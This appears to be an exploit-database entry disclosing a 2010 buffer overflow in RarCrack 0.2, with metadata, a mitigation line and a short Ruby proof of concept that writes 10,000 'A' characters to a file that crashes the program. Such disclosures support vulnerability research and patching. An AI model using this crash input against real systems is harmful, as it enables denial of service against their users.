RarCrack 0.2 Buffer Overflow POC

vendor:

RarCrack

by:

The_UnKn@wn

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: RarCrack

Affected Version From: 0.2

Affected Version To: 0.2

Patch Exists: NO

Related CWE: none

CPE: a:rarcrack:rarcrack:0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: openSUSE 11.3

2010

RarCrack 0.2 Buffer Overflow POC

RarCrack doesn't check the length of the archive and while cracking it crashes.

Mitigation:

Input validation should be used to prevent buffer overflows.

Source

Exploit-DB raw data:

#!/usr/bin/env ruby
#  overflow.rb
#
#    __________  ____  __  ______  _________
#   / ____/ __ \/ __ \/ / / / __ \/ ____<  /
#  / / __/ /_/ / / / / / / / /_/ /___ \ / / 
# / /_/ / _, _/ /_/ / /_/ / ____/___/ // /  
# \____/_/ |_|\____/\____/_/   /_____//_/   
#                                         
#
# 	Title: 		RarCrack 0.2 Buffer Overflow POC
# 	Date: 		19.09.2010
# 	Author: 	The_UnKn@wn
# 	Email:		the_unknown [at] group51.org
# 	Twitter:	@The_UnKn0wn
# 	Homepage:	http://group51.org 	
# 	Software Link: 	http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download
# 	Version: 	0.2
# 	Tested on: 	openSUSE 11.3
# 	CVE: 		none 
#
#	Impact:		RarCrack doesn't check the length of the archive and while cracking it crashes.
#
#	Usage: 
#		$ ruby overflow.rb
#		$ ./rarcrack overflow.zip
#		

text = "A"*10000

File.open("overflow.zip","w") do |l|
	l.puts(text)
end